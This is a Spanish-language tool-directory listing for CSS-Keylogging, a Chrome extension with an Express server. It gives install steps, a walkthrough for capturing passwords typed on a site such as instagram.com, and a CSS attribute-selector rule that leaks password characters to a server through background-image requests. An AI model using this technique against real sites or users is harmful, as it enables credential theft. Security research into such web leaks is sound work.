Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CSS-Keylogging — Extensión de Chrome y servidor Express que explota las capacidades de keylogging de CSS. | Kitploit
Herramientas/GitHubGitHub/maxchehab/css-keylogging
ExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmaxchehab/css-keylogging

CSS-Keylogging

Extensión de Chrome y servidor Express que explota las capacidades de keylogging de CSS.

Ver Repositorio
3.2k4244hace 8 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CSS Keylogger

Extensión de Chrome y servidor Express que explota las capacidades de keylogging de CSS.

Cómo usarlo

Configurar la extensión de Chrome

  1. Descargar el repositorio git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visitar chrome://extensions en tu navegador (o abrir el menú de Chrome haciendo clic en el icono a la derecha del Omnibox: el icono del menú son tres barras horizontales y seleccionar Extensiones bajo el menú Más Herramientas para llegar al mismo lugar).
  3. Asegurarse de que la casilla Modo desarrollador en la esquina superior derecha esté marcada.
  4. Hacer clic en Cargar extensión sin empaquetar… para abrir un diálogo de selección de archivos.
  5. Seleccionar la carpeta css-keylogger-extension en el directorio donde descargaste este repositorio.

Configurar el servidor Express

  1. yarn
  • yarn start
  • Hackear contraseñas l33t

    1. Abrir un sitio web que utilice un framework de componentes controlados, como React. https://instagram.com.
    2. Presionar la extensión C en la parte superior derecha de cualquier página web.
    3. Escribir tu contraseña.
    4. Tu contraseña debería ser capturada por el servidor Express.

    Cómo funciona

    Este ataque es realmente simple. Utilizando selectores de atributos CSS, se pueden solicitar recursos de un servidor externo bajo la premisa de cargar una background-image.

    Por ejemplo, el siguiente CSS seleccionará todos los inputs con un type igual a password y un value que termine en a. Luego intentará cargar una imagen desde http://localhost:3000/a.

    root@kitploit:~
    input[type="password"][value$="a"] {
      background-image: url("http://localhost:3000/a");
    }
    

    Usando un script simple se puede crear un archivo css que enviará una solicitud personalizada para cada carácter ASCII.

    Descargar herramienta